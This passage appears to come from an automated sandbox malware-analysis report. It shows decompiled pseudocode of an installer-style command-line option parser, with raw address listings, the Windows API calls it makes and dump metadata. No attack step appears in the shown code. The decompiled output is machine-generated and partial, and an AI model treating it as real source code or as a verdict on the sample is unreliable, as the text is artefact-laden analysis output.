                                                                                                                                                                                                    														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                    														_t202 = _t50;
                                                                                                                                                                                                    														do {
                                                                                                                                                                                                    															_t88 =  *_t183;
                                                                                                                                                                                                    															_t183 = _t183 + 1;
                                                                                                                                                                                                    														} while (_t88 != 0);
                                                                                                                                                                                                    														if(_t183 == _t202) {
                                                                                                                                                                                                    															goto L49;
                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                    															_t205 = 0x5b;
                                                                                                                                                                                                    															if(E0039667F(_t215, _t205) == 0) {
                                                                                                                                                                                                    																L115:
                                                                                                                                                                                                    																_t206 = 0x5d;
                                                                                                                                                                                                    																if(E0039667F(_t215, _t206) == 0) {
                                                                                                                                                                                                    																	L117:
                                                                                                                                                                                                    																	_t202 =  &_v276;
                                                                                                                                                                                                    																	_v276 = _t167;
                                                                                                                                                                                                    																	if(E00395C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                    																		goto L49;
                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                    																		_t202 = 0x104;
                                                                                                                                                                                                    																		E00391680(0x398c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	_t202 = 0x5b;
                                                                                                                                                                                                    																	if(E0039667F(_t215, _t202) == 0) {
                                                                                                                                                                                                    																		goto L49;
                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                    																		goto L117;
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																_t202 = 0x5d;
                                                                                                                                                                                                    																if(E0039667F(_t215, _t202) == 0) {
                                                                                                                                                                                                    																	goto L49;
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	goto L115;
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													 *0x398a24 = 1;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												goto L50;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												_t100 = _t87 - 1;
                                                                                                                                                                                                    												if(_t100 == 0) {
                                                                                                                                                                                                    													L98:
                                                                                                                                                                                                    													if(_v266 != 0x3a) {
                                                                                                                                                                                                    														goto L49;
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                    														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                    														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                    														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                    														_t202 = _t38;
                                                                                                                                                                                                    														do {
                                                                                                                                                                                                    															_t101 =  *_t192;
                                                                                                                                                                                                    															_t192 = _t192 + 1;
                                                                                                                                                                                                    														} while (_t101 != 0);
                                                                                                                                                                                                    														if(_t192 == _t202) {
                                                                                                                                                                                                    															goto L49;
                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                    															_t202 =  &_v276;
                                                                                                                                                                                                    															_v276 = _t170;
                                                                                                                                                                                                    															if(E00395C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                    																goto L49;
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                    																_t218 = 0x398b3e;
                                                                                                                                                                                                    																_t105 = _v276;
                                                                                                                                                                                                    																if(_t104 != 0x54) {
                                                                                                                                                                                                    																	_t218 = 0x398a3a;
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    																E00391680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                    																_t202 = 0x104;
                                                                                                                                                                                                    																E0039658A(_t218, 0x104, 0x391140);
                                                                                                                                                                                                    																if(E003931E0(_t218) != 0) {
                                                                                                                                                                                                    																	goto L50;
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	goto L106;
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													_t111 = _t100 - 0xa;
                                                                                                                                                                                                    													if(_t111 == 0) {
                                                                                                                                                                                                    														if(_v266 != 0) {
                                                                                                                                                                                                    															if(_v266 != 0x3a) {
                                                                                                                                                                                                    																goto L49;
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																_t199 = _v265;
                                                                                                                                                                                                    																if(_t199 != 0) {
                                                                                                                                                                                                    																	_t219 =  &_v265;
                                                                                                                                                                                                    																	do {
                                                                                                                                                                                                    																		_t219 = _t219 + 1;
                                                                                                                                                                                                    																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                    																		if(_t115 == 0) {
                                                                                                                                                                                                    																			 *0x398a2c = 1;
                                                                                                                                                                                                    																		} else {
                                                                                                                                                                                                    																			_t200 = 2;
                                                                                                                                                                                                    																			_t119 = _t115 - _t200;
                                                                                                                                                                                                    																			if(_t119 == 0) {
                                                                                                                                                                                                    																				 *0x398a30 = 1;
                                                                                                                                                                                                    																			} else {
                                                                                                                                                                                                    																				if(_t119 == 0xf) {
                                                                                                                                                                                                    																					 *0x398a34 = 1;
                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                    																					_t209 = 0;
                                                                                                                                                                                                    																				}
                                                                                                                                                                                                    																			}
                                                                                                                                                                                                    																		}
                                                                                                                                                                                                    																		_t118 =  *_t219;
                                                                                                                                                                                                    																		_t199 = _t118;
                                                                                                                                                                                                    																	} while (_t118 != 0);
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                    															 *0x398a2c = 1;
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    														goto L50;
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														_t127 = _t111 - 3;
                                                                                                                                                                                                    														if(_t127 == 0) {
                                                                                                                                                                                                    															if(_v266 != 0) {
                                                                                                                                                                                                    																if(_v266 != 0x3a) {
                                                                                                                                                                                                    																	goto L49;
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                    																	if(_t129 == 0x31) {
                                                                                                                                                                                                    																		goto L76;
                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                    																		if(_t129 == 0x41) {
                                                                                                                                                                                                    																			goto L83;
                                                                                                                                                                                                    																		} else {
                                                                                                                                                                                                    																			if(_t129 == 0x55) {
                                                                                                                                                                                                    																				goto L76;
                                                                                                                                                                                                    																			} else {
                                                                                                                                                                                                    																				goto L49;
                                                                                                                                                                                                    																			}
                                                                                                                                                                                                    																		}
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																L76:
                                                                                                                                                                                                    																_push(2);
                                                                                                                                                                                                    																_pop(1);
                                                                                                                                                                                                    																L83:
                                                                                                                                                                                                    																 *0x398a38 = 1;
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    															goto L50;
                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                    															_t132 = _t127 - 1;
                                                                                                                                                                                                    															if(_t132 == 0) {
                                                                                                                                                                                                    																if(_v266 != 0) {
                                                                                                                                                                                                    																	if(_v266 != 0x3a) {
                                                                                                                                                                                                    																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                    																			goto L49;
                                                                                                                                                                                                    																		}
                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                    																		_t201 = _v265;
                                                                                                                                                                                                    																		 *0x399a2c = 1;
                                                                                                                                                                                                    																		if(_t201 != 0) {
                                                                                                                                                                                                    																			_t220 =  &_v265;
                                                                                                                                                                                                    																			do {
                                                                                                                                                                                                    																				_t220 = _t220 + 1;
                                                                                                                                                                                                    																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                    																				if(_t142 == 0) {
                                                                                                                                                                                                    																					_t143 = 2;
                                                                                                                                                                                                    																					 *0x399a2c =  *0x399a2c | _t143;
                                                                                                                                                                                                    																					goto L70;
                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                    																					_t145 = _t142 - 3;
                                                                                                                                                                                                    																					if(_t145 == 0) {
                                                                                                                                                                                                    																						 *0x398d48 =  *0x398d48 | 0x00000040;
                                                                                                                                                                                                    																					} else {
                                                                                                                                                                                                    																						_t146 = _t145 - 5;
                                                                                                                                                                                                    																						if(_t146 == 0) {
                                                                                                                                                                                                    																							 *0x399a2c =  *0x399a2c & 0xfffffffd;
                                                                                                                                                                                                    																							goto L70;
                                                                                                                                                                                                    																						} else {
                                                                                                                                                                                                    																							_t147 = _t146 - 5;
                                                                                                                                                                                                    																							if(_t147 == 0) {
                                                                                                                                                                                                    																								 *0x399a2c =  *0x399a2c & 0xfffffffe;
                                                                                                                                                                                                    																								goto L70;
                                                                                                                                                                                                    																							} else {
                                                                                                                                                                                                    																								_t149 = _t147;
                                                                                                                                                                                                    																								if(_t149 == 0) {
                                                                                                                                                                                                    																									 *0x398d48 =  *0x398d48 | 0x00000080;
                                                                                                                                                                                                    																								} else {
                                                                                                                                                                                                    																									if(_t149 == 3) {
                                                                                                                                                                                                    																										 *0x399a2c =  *0x399a2c | 0x00000004;
                                                                                                                                                                                                    																										L70:
                                                                                                                                                                                                    																										 *0x398a28 = 1;
                                                                                                                                                                                                    																									} else {
                                                                                                                                                                                                    																										_t209 = 0;
                                                                                                                                                                                                    																									}
                                                                                                                                                                                                    																								}
                                                                                                                                                                                                    																							}
                                                                                                                                                                                                    																						}
                                                                                                                                                                                                    																					}
                                                                                                                                                                                                    																				}
                                                                                                                                                                                                    																				_t144 =  *_t220;
                                                                                                                                                                                                    																				_t201 = _t144;
                                                                                                                                                                                                    																			} while (_t144 != 0);
                                                                                                                                                                                                    																		}
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	 *0x399a2c = 3;
                                                                                                                                                                                                    																	 *0x398a28 = 1;
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    																goto L50;
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																if(_t132 == 0) {
                                                                                                                                                                                                    																	goto L98;
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	L49:
                                                                                                                                                                                                    																	_t209 = 0;
                                                                                                                                                                                                    																	L50:
                                                                                                                                                                                                    																	_t173 = _v272;
                                                                                                                                                                                                    																	if( *_t173 != 0) {
                                                                                                                                                                                                    																		goto L2;
                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                    																		break;
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											goto L106;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										L34:
                                                                                                                                                                                                    										_t209 = 0;
                                                                                                                                                                                                    										break;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L131;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if( *0x398a2c != 0 &&  *0x398b3e == 0) {
                                                                                                                                                                                                    						if(GetModuleFileNameA( *0x399a3c, 0x398b3e, 0x104) == 0) {
                                                                                                                                                                                                    							_t209 = 0;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t202 = 0x5c;
                                                                                                                                                                                                    							 *((char*)(E003966C8(0x398b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t63 = _t209;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				L131:
                                                                                                                                                                                                    			}


































































                                                                                                                                                                                                    0x00395c9e
                                                                                                                                                                                                    0x00395ca9
                                                                                                                                                                                                    0x00395cb0
                                                                                                                                                                                                    0x00395cb3
                                                                                                                                                                                                    0x00395cb6
                                                                                                                                                                                                    0x00395cb7
                                                                                                                                                                                                    0x00395cb8
                                                                                                                                                                                                    0x00395cbd
                                                                                                                                                                                                    0x00396204
                                                                                                                                                                                                    0x00395ccb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395ccb
                                                                                                                                                                                                    0x00395cd3
                                                                                                                                                                                                    0x00395cd7
                                                                                                                                                                                                    0x00395cf4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395cf4
                                                                                                                                                                                                    0x00395cf8
                                                                                                                                                                                                    0x00395d00
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395d06
                                                                                                                                                                                                    0x00395d06
                                                                                                                                                                                                    0x00395d0e
                                                                                                                                                                                                    0x00395d10
                                                                                                                                                                                                    0x00395d12
                                                                                                                                                                                                    0x00395d14
                                                                                                                                                                                                    0x00395d15
                                                                                                                                                                                                    0x00395d17
                                                                                                                                                                                                    0x00395d49
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395d19
                                                                                                                                                                                                    0x00395d19
                                                                                                                                                                                                    0x00395d1d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395d3f
                                                                                                                                                                                                    0x00395d3f
                                                                                                                                                                                                    0x00395d4b
                                                                                                                                                                                                    0x00395d4b
                                                                                                                                                                                                    0x00395d4f
                                                                                                                                                                                                    0x00395d8d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395d93
                                                                                                                                                                                                    0x00395d93
                                                                                                                                                                                                    0x00395d9a
                                                                                                                                                                                                    0x00395d9d
                                                                                                                                                                                                    0x00395d9e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395d9e
                                                                                                                                                                                                    0x00395d51
                                                                                                                                                                                                    0x00395d5b
                                                                                                                                                                                                    0x00395d72
                                                                                                                                                                                                    0x003960fb
                                                                                                                                                                                                    0x003960fb
                                                                                                                                                                                                    0x00396207
                                                                                                                                                                                                    0x0039620a
                                                                                                                                                                                                    0x0039620b
                                                                                                                                                                                                    0x0039620e
                                                                                                                                                                                                    0x00396217
                                                                                                                                                                                                    0x00395d78
                                                                                                                                                                                                    0x00395d78
                                                                                                                                                                                                    0x00395d80
                                                                                                                                                                                                    0x00395d83
                                                                                                                                                                                                    0x00395d84
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395d84
                                                                                                                                                                                                    0x00395d5d
                                                                                                                                                                                                    0x00395d5f
                                                                                                                                                                                                    0x00395d62
                                                                                                                                                                                                    0x00395d68
                                                                                                                                                                                                    0x00395d64
                                                                                                                                                                                                    0x00395d64
                                                                                                                                                                                                    0x00395d64
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395d62
                                                                                                                                                                                                    0x00395d5b
                                                                                                                                                                                                    0x00395d4f
                                                                                                                                                                                                    0x00395d1d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395d9f
                                                                                                                                                                                                    0x00395d9f
                                                                                                                                                                                                    0x00395da5
                                                                                                                                                                                                    0x00395dab
                                                                                                                                                                                                    0x00395dba
                                                                                                                                                                                                    0x00396218
                                                                                                                                                                                                    0x0039621d
                                                                                                                                                                                                    0x00396220
                                                                                                                                                                                                    0x00396221
                                                                                                                                                                                                    0x00396229
                                                                                                                                                                                                    0x00396230
                                                                                                                                                                                                    0x00396247
                                                                                                                                                                                                    0x0039626a
                                                                                                                                                                                                    0x00396272
                                                                                                                                                                                                    0x00396249
                                                                                                                                                                                                    0x00396255
                                                                                                                                                                                                    0x0039625f
                                                                                                                                                                                                    0x00396264
                                                                                                                                                                                                    0x00396264
                                                                                                                                                                                                    0x00396284
                                                                                                                                                                                                    0x00395dc0
                                                                                                                                                                                                    0x00395dc0
                                                                                                                                                                                                    0x00395dca
                                                                                                                                                                                                    0x00395e22
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395dcc
                                                                                                                                                                                                    0x00395dce
                                                                                                                                                                                                    0x00395e24
                                                                                                                                                                                                    0x00395e24
                                                                                                                                                                                                    0x00395e2c
                                                                                                                                                                                                    0x00395e47
                                                                                                                                                                                                    0x00395e4a
                                                                                                                                                                                                    0x003961d2
                                                                                                                                                                                                    0x003961e2
                                                                                                                                                                                                    0x003961e7
                                                                                                                                                                                                    0x003961ee
                                                                                                                                                                                                    0x003961f1
                                                                                                                                                                                                    0x003961f1
                                                                                                                                                                                                    0x003961f8
                                                                                                                                                                                                    0x003961f8
                                                                                                                                                                                                    0x00395e50
                                                                                                                                                                                                    0x00395e53
                                                                                                                                                                                                    0x00396109
                                                                                                                                                                                                    0x0039611f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00396125
                                                                                                                                                                                                    0x00396137
                                                                                                                                                                                                    0x0039613a
                                                                                                                                                                                                    0x0039613c
                                                                                                                                                                                                    0x0039613e
                                                                                                                                                                                                    0x0039613e
                                                                                                                                                                                                    0x00396141
                                                                                                                                                                                                    0x00396141
                                                                                                                                                                                                    0x00396143
                                                                                                                                                                                                    0x00396144
                                                                                                                                                                                                    0x0039614a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00396150
                                                                                                                                                                                                    0x00396152
                                                                                                                                                                                                    0x0039615c
                                                                                                                                                                                                    0x00396170
                                                                                                                                                                                                    0x00396172
                                                                                                                                                                                                    0x0039617c
                                                                                                                                                                                                    0x00396190
                                                                                                                                                                                                    0x00396190
                                                                                                                                                                                                    0x00396196
                                                                                                                                                                                                    0x003961a5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003961ab
                                                                                                                                                                                                    0x003961b9
                                                                                                                                                                                                    0x003961c6
                                                                                                                                                                                                    0x003961c6
                                                                                                                                                                                                    0x0039617e
                                                                                                                                                                                                    0x00396180
                                                                                                                                                                                                    0x0039618a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039618a
                                                                                                                                                                                                    0x0039615e
                                                                                                                                                                                                    0x00396160
                                                                                                                                                                                                    0x0039616a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039616a
                                                                                                                                                                                                    0x0039615c
                                                                                                                                                                                                    0x0039614a
                                                                                                                                                                                                    0x0039610b
                                                                                                                                                                                                    0x0039610e
                                                                                                                                                                                                    0x0039610e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395e59
                                                                                                                                                                                                    0x00395e59
                                                                                                                                                                                                    0x00395e5c
                                                                                                                                                                                                    0x0039604f
                                                                                                                                                                                                    0x00396056
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039605c
                                                                                                                                                                                                    0x0039606e
                                                                                                                                                                                                    0x00396071
                                                                                                                                                                                                    0x00396073
                                                                                                                                                                                                    0x00396075
                                                                                                                                                                                                    0x00396075
                                                                                                                                                                                                    0x00396078
                                                                                                                                                                                                    0x00396078
                                                                                                                                                                                                    0x0039607a
                                                                                                                                                                                                    0x0039607b
                                                                                                                                                                                                    0x00396081
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00396087
                                                                                                                                                                                                    0x00396087
                                                                                                                                                                                                    0x0039608d
                                                                                                                                                                                                    0x0039609c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003960a2
                                                                                                                                                                                                    0x003960aa
                                                                                                                                                                                                    0x003960b2
                                                                                                                                                                                                    0x003960b7
                                                                                                                                                                                                    0x003960bd
                                                                                                                                                                                                    0x003960bf
                                                                                                                                                                                                    0x003960bf
                                                                                                                                                                                                    0x003960d6
                                                                                                                                                                                                    0x003960e0
                                                                                                                                                                                                    0x003960e7
                                                                                                                                                                                                    0x003960f5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003960f5
                                                                                                                                                                                                    0x0039609c
                                                                                                                                                                                                    0x00396081
                                                                                                                                                                                                    0x00395e62
                                                                                                                                                                                                    0x00395e62
                                                                                                                                                                                                    0x00395e65
                                                                                                                                                                                                    0x00395fd3
                                                                                                                                                                                                    0x00395fe9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395fef
                                                                                                                                                                                                    0x00395fef
                                                                                                                                                                                                    0x00395ff7
                                                                                                                                                                                                    0x00395ffd
                                                                                                                                                                                                    0x00396003
                                                                                                                                                                                                    0x00396006
                                                                                                                                                                                                    0x00396011
                                                                                                                                                                                                    0x00396014
                                                                                                                                                                                                    0x0039603d
                                                                                                                                                                                                    0x00396016
                                                                                                                                                                                                    0x00396018
                                                                                                                                                                                                    0x00396019
                                                                                                                                                                                                    0x0039601b
                                                                                                                                                                                                    0x00396033
                                                                                                                                                                                                    0x0039601d
                                                                                                                                                                                                    0x00396020
                                                                                                                                                                                                    0x00396029
                                                                                                                                                                                                    0x00396022
                                                                                                                                                                                                    0x00396022
                                                                                                                                                                                                    0x00396022
                                                                                                                                                                                                    0x00396020
                                                                                                                                                                                                    0x0039601b
                                                                                                                                                                                                    0x00396042
                                                                                                                                                                                                    0x00396044
                                                                                                                                                                                                    0x00396046
                                                                                                                                                                                                    0x0039604a
                                                                                                                                                                                                    0x00395ff7
                                                                                                                                                                                                    0x00395fd5
                                                                                                                                                                                                    0x00395fd8
                                                                                                                                                                                                    0x00395fd8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395e6b
                                                                                                                                                                                                    0x00395e6b
                                                                                                                                                                                                    0x00395e6e
                                                                                                                                                                                                    0x00395f8b
                                                                                                                                                                                                    0x00395f99
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395f9f
                                                                                                                                                                                                    0x00395fa7
                                                                                                                                                                                                    0x00395faf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395fb1
                                                                                                                                                                                                    0x00395fb3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395fb5
                                                                                                                                                                                                    0x00395fb7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395fb9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395fb9
                                                                                                                                                                                                    0x00395fb7
                                                                                                                                                                                                    0x00395fb3
                                                                                                                                                                                                    0x00395faf
                                                                                                                                                                                                    0x00395f8d
                                                                                                                                                                                                    0x00395f8d
                                                                                                                                                                                                    0x00395f8d
                                                                                                                                                                                                    0x00395f8f
                                                                                                                                                                                                    0x00395fc1
                                                                                                                                                                                                    0x00395fc1
                                                                                                                                                                                                    0x00395fc1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395e74
                                                                                                                                                                                                    0x00395e74
                                                                                                                                                                                                    0x00395e77
                                                                                                                                                                                                    0x00395ea0
                                                                                                                                                                                                    0x00395ebd
                                                                                                                                                                                                    0x00395f79
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395f7f
                                                                                                                                                                                                    0x00395ec3
                                                                                                                                                                                                    0x00395ec3
                                                                                                                                                                                                    0x00395ecc
                                                                                                                                                                                                    0x00395ed4
                                                                                                                                                                                                    0x00395ed6
                                                                                                                                                                                                    0x00395edc
                                                                                                                                                                                                    0x00395edf
                                                                                                                                                                                                    0x00395eea
                                                                                                                                                                                                    0x00395eed
                                                                                                                                                                                                    0x00395f3f
                                                                                                                                                                                                    0x00395f40
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395eef
                                                                                                                                                                                                    0x00395eef
                                                                                                                                                                                                    0x00395ef2
                                                                                                                                                                                                    0x00395f34
                                                                                                                                                                                                    0x00395ef4
                                                                                                                                                                                                    0x00395ef4
                                                                                                                                                                                                    0x00395ef7
                                                                                                                                                                                                    0x00395f2b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395ef9
                                                                                                                                                                                                    0x00395ef9
                                                                                                                                                                                                    0x00395efc
                                                                                                                                                                                                    0x00395f22
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395efe
                                                                                                                                                                                                    0x00395eff
                                                                                                                                                                                                    0x00395f02
                                                                                                                                                                                                    0x00395f16
                                                                                                                                                                                                    0x00395f04
                                                                                                                                                                                                    0x00395f07
                                                                                                                                                                                                    0x00395f0d
                                                                                                                                                                                                    0x00395f46
                                                                                                                                                                                                    0x00395f46
                                                                                                                                                                                                    0x00395f09
                                                                                                                                                                                                    0x00395f09
                                                                                                                                                                                                    0x00395f09
                                                                                                                                                                                                    0x00395f07
                                                                                                                                                                                                    0x00395f02
                                                                                                                                                                                                    0x00395efc
                                                                                                                                                                                                    0x00395ef7
                                                                                                                                                                                                    0x00395ef2
                                                                                                                                                                                                    0x00395f4c
                                                                                                                                                                                                    0x00395f4e
                                                                                                                                                                                                    0x00395f50
                                                                                                                                                                                                    0x00395f54
                                                                                                                                                                                                    0x00395ed4
                                                                                                                                                                                                    0x00395ea2
                                                                                                                                                                                                    0x00395ea4
                                                                                                                                                                                                    0x00395eaf
                                                                                                                                                                                                    0x00395eaf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395e79
                                                                                                                                                                                                    0x00395e7d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395e83
                                                                                                                                                                                                    0x00395e83
                                                                                                                                                                                                    0x00395e83
                                                                                                                                                                                                    0x00395e85
                                                                                                                                                                                                    0x00395e85
                                                                                                                                                                                                    0x00395e8e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395e94
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395e94
                                                                                                                                                                                                    0x00395e8e
                                                                                                                                                                                                    0x00395e7d
                                                                                                                                                                                                    0x00395e77
                                                                                                                                                                                                    0x00395e6e
                                                                                                                                                                                                    0x00395e65
                                                                                                                                                                                                    0x00395e5c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395dd0
                                                                                                                                                                                                    0x00395dd0
                                                                                                                                                                                                    0x00395dd0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395dd0
                                                                                                                                                                                                    0x00395dce
                                                                                                                                                                                                    0x00395dca
                                                                                                                                                                                                    0x00395dba
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395d00
                                                                                                                                                                                                    0x00395dd9
                                                                                                                                                                                                    0x00395e04
                                                                                                                                                                                                    0x003961fe
                                                                                                                                                                                                    0x00395e0a
                                                                                                                                                                                                    0x00395e0c
                                                                                                                                                                                                    0x00395e17
                                                                                                                                                                                                    0x00395e17
                                                                                                                                                                                                    0x00395e04
                                                                                                                                                                                                    0x00396200
                                                                                                                                                                                                    0x00396200
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CharNextA.USER32(?,00000000,?,?), ref: 00395CEE
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00398B3E,00000104,00000000,?,?), ref: 00395DFC
                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 00395E3E
                                                                                                                                                                                                    • CharUpperA.USER32(-00000052), ref: 00395EE1
                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00395F6F
                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 00395FA7
                                                                                                                                                                                                    • CharUpperA.USER32(-0000004E), ref: 00396008
                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 003960AA
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00391140,00000000,00000040,00000000), ref: 003961F1
                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 003961F8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                    • String ID: "$"$:$RegServer
                                                                                                                                                                                                    • API String ID: 1203814774-25366791
                                                                                                                                                                                                    • Opcode ID: 54bd1d80671d6666de93fff88415052b2ce14f29f84dbecb62ff6b50cdde351a
